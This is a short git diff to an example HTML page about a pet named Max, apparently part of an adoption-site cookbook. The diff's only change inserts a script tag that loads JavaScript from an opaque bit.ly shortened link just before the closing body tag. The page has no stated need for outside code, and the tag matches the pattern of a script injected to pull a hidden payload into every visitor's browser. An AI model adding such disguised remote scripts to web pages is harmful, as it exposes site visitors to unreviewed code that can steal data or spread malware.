--- a/cookbook/examples/adopt-me-plz/max.html
+++ b/cookbook/examples/adopt-me-plz/max.html
@@ -36,5 +36,6 @@
                 short intervals.  After that, he loves to nap in the sun.
             </p>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
